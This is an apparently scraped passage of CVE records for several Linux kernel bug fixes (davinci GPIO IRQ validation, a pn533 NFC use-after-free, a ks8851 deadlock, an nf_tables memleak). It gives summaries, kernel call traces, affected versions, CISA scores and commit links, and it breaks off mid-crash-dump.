"dateUpdated": "2025-05-04T08:53:32.255Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42092 (GCVE-0-2024-42092)
Vulnerability from cvelistv5
Published
2024-07-29 17:35
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
gpio: davinci: Validate the obtained number of IRQs
Value of pdata->gpio_unbanked is taken from Device Tree. In case of broken
DT due to any error this value can be any. Without this value validation
there can be out of chips->irqs array boundaries access in
davinci_gpio_probe().
Validate the obtained nirq value so that it won't exceed the maximum
number of IRQs per bank.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a Version: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a Version: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a Version: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a Version: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a Version: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a Version: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a Version: eb3744a2dd01cb07ce9f556d56d6fe451f0c313a |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.053Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a8d78984fdc105bc1a38b73e98d32b1bc4222684"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd75721984337c38a12aeca33ba301d31ca4b3fd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e44a83bf15c4db053ac6dfe96a23af184c9136d9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70b48899f3f23f98a52c5b1060aefbdc7ba7957b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/89d7008af4945808677662a630643b5ea89c6e8d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2d83492259ad746b655f196cd5d1be4b3d0a3782"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c542e51306d5f1eba3af84daa005826223382470"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7aa9b96e9a73e4ec1771492d0527bd5fc5ef9164"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42092",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:18:34.561678Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:00.849Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpio/gpio-davinci.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a8d78984fdc105bc1a38b73e98d32b1bc4222684",
"status": "affected",
"version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
"versionType": "git"
},
{
"lessThan": "cd75721984337c38a12aeca33ba301d31ca4b3fd",
"status": "affected",
"version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
"versionType": "git"
},
{
"lessThan": "e44a83bf15c4db053ac6dfe96a23af184c9136d9",
"status": "affected",
"version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
"versionType": "git"
},
{
"lessThan": "70b48899f3f23f98a52c5b1060aefbdc7ba7957b",
"status": "affected",
"version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
"versionType": "git"
},
{
"lessThan": "89d7008af4945808677662a630643b5ea89c6e8d",
"status": "affected",
"version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
"versionType": "git"
},
{
"lessThan": "2d83492259ad746b655f196cd5d1be4b3d0a3782",
"status": "affected",
"version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
"versionType": "git"
},
{
"lessThan": "c542e51306d5f1eba3af84daa005826223382470",
"status": "affected",
"version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
"versionType": "git"
},
{
"lessThan": "7aa9b96e9a73e4ec1771492d0527bd5fc5ef9164",
"status": "affected",
"version": "eb3744a2dd01cb07ce9f556d56d6fe451f0c313a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpio/gpio-davinci.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.317",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.317",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpio: davinci: Validate the obtained number of IRQs\n\nValue of pdata-\u003egpio_unbanked is taken from Device Tree. In case of broken\nDT due to any error this value can be any. Without this value validation\nthere can be out of chips-\u003eirqs array boundaries access in\ndavinci_gpio_probe().\n\nValidate the obtained nirq value so that it won\u0027t exceed the maximum\nnumber of IRQs per bank.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:49.782Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a8d78984fdc105bc1a38b73e98d32b1bc4222684"
},
{
"url": "https://git.kernel.org/stable/c/cd75721984337c38a12aeca33ba301d31ca4b3fd"
},
{
"url": "https://git.kernel.org/stable/c/e44a83bf15c4db053ac6dfe96a23af184c9136d9"
},
{
"url": "https://git.kernel.org/stable/c/70b48899f3f23f98a52c5b1060aefbdc7ba7957b"
},
{
"url": "https://git.kernel.org/stable/c/89d7008af4945808677662a630643b5ea89c6e8d"
},
{
"url": "https://git.kernel.org/stable/c/2d83492259ad746b655f196cd5d1be4b3d0a3782"
},
{
"url": "https://git.kernel.org/stable/c/c542e51306d5f1eba3af84daa005826223382470"
},
{
"url": "https://git.kernel.org/stable/c/7aa9b96e9a73e4ec1771492d0527bd5fc5ef9164"
}
],
"title": "gpio: davinci: Validate the obtained number of IRQs",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42092",
"datePublished": "2024-07-29T17:35:01.209Z",
"dateReserved": "2024-07-29T15:50:41.172Z",
"dateUpdated": "2025-05-04T09:22:49.782Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52907 (GCVE-0-2023-52907)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nfc: pn533: Wait for out_urb's completion in pn533_usb_send_frame()
Fix a use-after-free that occurs in hcd when in_urb sent from
pn533_usb_send_frame() is completed earlier than out_urb. Its callback
frees the skb data in pn533_send_async_complete() that is used as a
transfer buffer of out_urb. Wait before sending in_urb until the
callback of out_urb is called. To modify the callback of out_urb alone,
separate the complete function of out_urb and ack_urb.
Found by a modified version of syzkaller.
BUG: KASAN: use-after-free in dummy_timer
Call Trace:
memcpy (mm/kasan/shadow.c:65)
dummy_perform_transfer (drivers/usb/gadget/udc/dummy_hcd.c:1352)
transfer (drivers/usb/gadget/udc/dummy_hcd.c:1453)
dummy_timer (drivers/usb/gadget/udc/dummy_hcd.c:1972)
arch_static_branch (arch/x86/include/asm/jump_label.h:27)
static_key_false (include/linux/jump_label.h:207)
timer_expire_exit (include/trace/events/timer.h:127)
call_timer_fn (kernel/time/timer.c:1475)
expire_timers (kernel/time/timer.c:1519)
__run_timers (kernel/time/timer.c:1790)
run_timer_softirq (kernel/time/timer.c:1803)
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c46ee38620a2aa2b25b16bc9738ace80dbff76a4 Version: c46ee38620a2aa2b25b16bc9738ace80dbff76a4 Version: c46ee38620a2aa2b25b16bc9738ace80dbff76a4 Version: c46ee38620a2aa2b25b16bc9738ace80dbff76a4 Version: c46ee38620a2aa2b25b16bc9738ace80dbff76a4 Version: c46ee38620a2aa2b25b16bc9738ace80dbff76a4 Version: c46ee38620a2aa2b25b16bc9738ace80dbff76a4 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52907",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:08.481823Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:13.576Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/nfc/pn533/usb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "35529d6b827eedb6bf7e81130e4b7e0aba9e58d2",
"status": "affected",
"version": "c46ee38620a2aa2b25b16bc9738ace80dbff76a4",
"versionType": "git"
},
{
"lessThan": "321db5131c92983dac4f3338e8fbb6df214238c0",
"status": "affected",
"version": "c46ee38620a2aa2b25b16bc9738ace80dbff76a4",
"versionType": "git"
},
{
"lessThan": "9424d2205fe94a095fb9365ec0c6137f0b394a2b",
"status": "affected",
"version": "c46ee38620a2aa2b25b16bc9738ace80dbff76a4",
"versionType": "git"
},
{
"lessThan": "0ca78c99656f5c448567db1e148367aa3b01c80a",
"status": "affected",
"version": "c46ee38620a2aa2b25b16bc9738ace80dbff76a4",
"versionType": "git"
},
{
"lessThan": "39ae73e581112cfe27ba50aecb1c891ce57cecb1",
"status": "affected",
"version": "c46ee38620a2aa2b25b16bc9738ace80dbff76a4",
"versionType": "git"
},
{
"lessThan": "8998db5021a28ad67aa8d627bdb4226e4046ccc4",
"status": "affected",
"version": "c46ee38620a2aa2b25b16bc9738ace80dbff76a4",
"versionType": "git"
},
{
"lessThan": "9dab880d675b9d0dd56c6428e4e8352a3339371d",
"status": "affected",
"version": "c46ee38620a2aa2b25b16bc9738ace80dbff76a4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/nfc/pn533/usb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.1"
},
{
"lessThan": "3.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.303",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.229",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.89",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.303",
"versionStartIncluding": "3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.270",
"versionStartIncluding": "3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.229",
"versionStartIncluding": "3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.164",
"versionStartIncluding": "3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.89",
"versionStartIncluding": "3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "3.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfc: pn533: Wait for out_urb\u0027s completion in pn533_usb_send_frame()\n\nFix a use-after-free that occurs in hcd when in_urb sent from\npn533_usb_send_frame() is completed earlier than out_urb. Its callback\nfrees the skb data in pn533_send_async_complete() that is used as a\ntransfer buffer of out_urb. Wait before sending in_urb until the\ncallback of out_urb is called. To modify the callback of out_urb alone,\nseparate the complete function of out_urb and ack_urb.\n\nFound by a modified version of syzkaller.\n\nBUG: KASAN: use-after-free in dummy_timer\nCall Trace:\n memcpy (mm/kasan/shadow.c:65)\n dummy_perform_transfer (drivers/usb/gadget/udc/dummy_hcd.c:1352)\n transfer (drivers/usb/gadget/udc/dummy_hcd.c:1453)\n dummy_timer (drivers/usb/gadget/udc/dummy_hcd.c:1972)\n arch_static_branch (arch/x86/include/asm/jump_label.h:27)\n static_key_false (include/linux/jump_label.h:207)\n timer_expire_exit (include/trace/events/timer.h:127)\n call_timer_fn (kernel/time/timer.c:1475)\n expire_timers (kernel/time/timer.c:1519)\n __run_timers (kernel/time/timer.c:1790)\n run_timer_softirq (kernel/time/timer.c:1803)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:47.091Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/35529d6b827eedb6bf7e81130e4b7e0aba9e58d2"
},
{
"url": "https://git.kernel.org/stable/c/321db5131c92983dac4f3338e8fbb6df214238c0"
},
{
"url": "https://git.kernel.org/stable/c/9424d2205fe94a095fb9365ec0c6137f0b394a2b"
},
{
"url": "https://git.kernel.org/stable/c/0ca78c99656f5c448567db1e148367aa3b01c80a"
},
{
"url": "https://git.kernel.org/stable/c/39ae73e581112cfe27ba50aecb1c891ce57cecb1"
},
{
"url": "https://git.kernel.org/stable/c/8998db5021a28ad67aa8d627bdb4226e4046ccc4"
},
{
"url": "https://git.kernel.org/stable/c/9dab880d675b9d0dd56c6428e4e8352a3339371d"
}
],
"title": "nfc: pn533: Wait for out_urb\u0027s completion in pn533_usb_send_frame()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52907",
"datePublished": "2024-08-21T06:10:48.171Z",
"dateReserved": "2024-08-21T06:07:11.015Z",
"dateUpdated": "2025-05-04T07:45:47.091Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41036 (GCVE-0-2024-41036)
Vulnerability from cvelistv5
Published
2024-07-29 14:31
Modified
2025-05-04 12:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: ks8851: Fix deadlock with the SPI chip variant
When SMP is enabled and spinlocks are actually functional then there is
a deadlock with the 'statelock' spinlock between ks8851_start_xmit_spi
and ks8851_irq:
watchdog: BUG: soft lockup - CPU#0 stuck for 27s!
call trace:
queued_spin_lock_slowpath+0x100/0x284
do_raw_spin_lock+0x34/0x44
ks8851_start_xmit_spi+0x30/0xb8
ks8851_start_xmit+0x14/0x20
netdev_start_xmit+0x40/0x6c
dev_hard_start_xmit+0x6c/0xbc
sch_direct_xmit+0xa4/0x22c
__qdisc_run+0x138/0x3fc
qdisc_run+0x24/0x3c
net_tx_action+0xf8/0x130
handle_softirqs+0x1ac/0x1f0
__do_softirq+0x14/0x20
____do_softirq+0x10/0x1c
call_on_irq_stack+0x3c/0x58
do_softirq_own_stack+0x1c/0x28
__irq_exit_rcu+0x54/0x9c
irq_exit_rcu+0x10/0x1c
el1_interrupt+0x38/0x50
el1h_64_irq_handler+0x18/0x24
el1h_64_irq+0x64/0x68
__netif_schedule+0x6c/0x80
netif_tx_wake_queue+0x38/0x48
ks8851_irq+0xb8/0x2c8
irq_thread_fn+0x2c/0x74
irq_thread+0x10c/0x1b0
kthread+0xc8/0xd8
ret_from_fork+0x10/0x20
This issue has not been identified earlier because tests were done on
a device with SMP disabled and so spinlocks were actually NOPs.
Now use spin_(un)lock_bh for TX queue related locking to avoid execution
of softirq work synchronously that would lead to a deadlock.
References
| URL | Tags | |
|---|---|---|
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1092525155eaad5c69ca9f3b6f3e7895a9424d66 Version: 30302b41ffdcd194bef27fb3b1a9f2ca53dedb27 Version: 3dc5d44545453de1de9c53cc529cc960a85933da Version: 3dc5d44545453de1de9c53cc529cc960a85933da Version: 786788bb1396ed5ea27e39c4933f59f4e52004e4 Version: 7c25c5d7274631b655f0f9098a16241fcd5db57b |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:55.963Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a0c69c492f4a8fad52f0a97565241c926160c9a4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/80ece00137300d74642f2038c8fe5440deaf9f05"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/10fec0cd0e8f56ff06c46bb24254c7d8f8f2bbf0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0913ec336a6c0c4a2b296bd9f74f8e41c4c83c8c"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41036",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:23:30.114712Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:03.463Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/micrel/ks8851_common.c",
"drivers/net/ethernet/micrel/ks8851_spi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a0c69c492f4a8fad52f0a97565241c926160c9a4",
"status": "affected",
"version": "1092525155eaad5c69ca9f3b6f3e7895a9424d66",
"versionType": "git"
},
{
"lessThan": "80ece00137300d74642f2038c8fe5440deaf9f05",
"status": "affected",
"version": "30302b41ffdcd194bef27fb3b1a9f2ca53dedb27",
"versionType": "git"
},
{
"lessThan": "10fec0cd0e8f56ff06c46bb24254c7d8f8f2bbf0",
"status": "affected",
"version": "3dc5d44545453de1de9c53cc529cc960a85933da",
"versionType": "git"
},
{
"lessThan": "0913ec336a6c0c4a2b296bd9f74f8e41c4c83c8c",
"status": "affected",
"version": "3dc5d44545453de1de9c53cc529cc960a85933da",
"versionType": "git"
},
{
"status": "affected",
"version": "786788bb1396ed5ea27e39c4933f59f4e52004e4",
"versionType": "git"
},
{
"status": "affected",
"version": "7c25c5d7274631b655f0f9098a16241fcd5db57b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/micrel/ks8851_common.c",
"drivers/net/ethernet/micrel/ks8851_spi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.7"
},
{
"lessThan": "6.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"versionStartIncluding": "6.1.70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"versionStartIncluding": "6.6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.10.206",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.15.146",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ks8851: Fix deadlock with the SPI chip variant\n\nWhen SMP is enabled and spinlocks are actually functional then there is\na deadlock with the \u0027statelock\u0027 spinlock between ks8851_start_xmit_spi\nand ks8851_irq:\n\n watchdog: BUG: soft lockup - CPU#0 stuck for 27s!\n call trace:\n queued_spin_lock_slowpath+0x100/0x284\n do_raw_spin_lock+0x34/0x44\n ks8851_start_xmit_spi+0x30/0xb8\n ks8851_start_xmit+0x14/0x20\n netdev_start_xmit+0x40/0x6c\n dev_hard_start_xmit+0x6c/0xbc\n sch_direct_xmit+0xa4/0x22c\n __qdisc_run+0x138/0x3fc\n qdisc_run+0x24/0x3c\n net_tx_action+0xf8/0x130\n handle_softirqs+0x1ac/0x1f0\n __do_softirq+0x14/0x20\n ____do_softirq+0x10/0x1c\n call_on_irq_stack+0x3c/0x58\n do_softirq_own_stack+0x1c/0x28\n __irq_exit_rcu+0x54/0x9c\n irq_exit_rcu+0x10/0x1c\n el1_interrupt+0x38/0x50\n el1h_64_irq_handler+0x18/0x24\n el1h_64_irq+0x64/0x68\n __netif_schedule+0x6c/0x80\n netif_tx_wake_queue+0x38/0x48\n ks8851_irq+0xb8/0x2c8\n irq_thread_fn+0x2c/0x74\n irq_thread+0x10c/0x1b0\n kthread+0xc8/0xd8\n ret_from_fork+0x10/0x20\n\nThis issue has not been identified earlier because tests were done on\na device with SMP disabled and so spinlocks were actually NOPs.\n\nNow use spin_(un)lock_bh for TX queue related locking to avoid execution\nof softirq work synchronously that would lead to a deadlock."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:57:28.471Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a0c69c492f4a8fad52f0a97565241c926160c9a4"
},
{
"url": "https://git.kernel.org/stable/c/80ece00137300d74642f2038c8fe5440deaf9f05"
},
{
"url": "https://git.kernel.org/stable/c/10fec0cd0e8f56ff06c46bb24254c7d8f8f2bbf0"
},
{
"url": "https://git.kernel.org/stable/c/0913ec336a6c0c4a2b296bd9f74f8e41c4c83c8c"
}
],
"title": "net: ks8851: Fix deadlock with the SPI chip variant",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41036",
"datePublished": "2024-07-29T14:31:50.669Z",
"dateReserved": "2024-07-12T12:17:45.620Z",
"dateUpdated": "2025-05-04T12:57:28.471Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27011 (GCVE-0-2024-27011)
Vulnerability from cvelistv5
Published
2024-05-01 05:29
Modified
2025-05-04 09:02
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: fix memleak in map from abort path
The delete set command does not rely on the transaction object for
element removal, therefore, a combination of delete element + delete set
from the abort path could result in restoring twice the refcount of the
mapping.
Check for inactive element in the next generation for the delete element
command in the abort path, skip restoring state if next generation bit
has been already cleared. This is similar to the activate logic using
the set walk iterator.
[ 6170.286929] ------------[ cut here ]------------
[ 6170.286939] WARNING: CPU: 6 PID: 790302 at net/netfilter/nf_tables_api.c:2086 nf_tables_chain_destroy+0x1f7/0x220 [nf_tables]
[ 6170.287071] Modules linked in: [...]
[ 6170.287633] CPU: 6 PID: 790302 Comm: kworker/6:2 Not tainted 6.9.0-rc3+ #365
[ 6170.287768] RIP: 0010:nf_tables_chain_destroy+0x1f7/0x220 [nf_tables]
[ 6170.287886] Code: df 48 8d 7d 58 e8 69 2e 3b df 48 8b 7d 58 e8 80 1b 37 df 48 8d 7d 68 e8 57 2e 3b df 48 8b 7d 68 e8 6e 1b 37 df 48 89 ef eb c4 <0f> 0b 48 83 c4 08 5b 5d 41 5c 41 5d 41 5e 41 5f c3 cc cc cc cc 0f
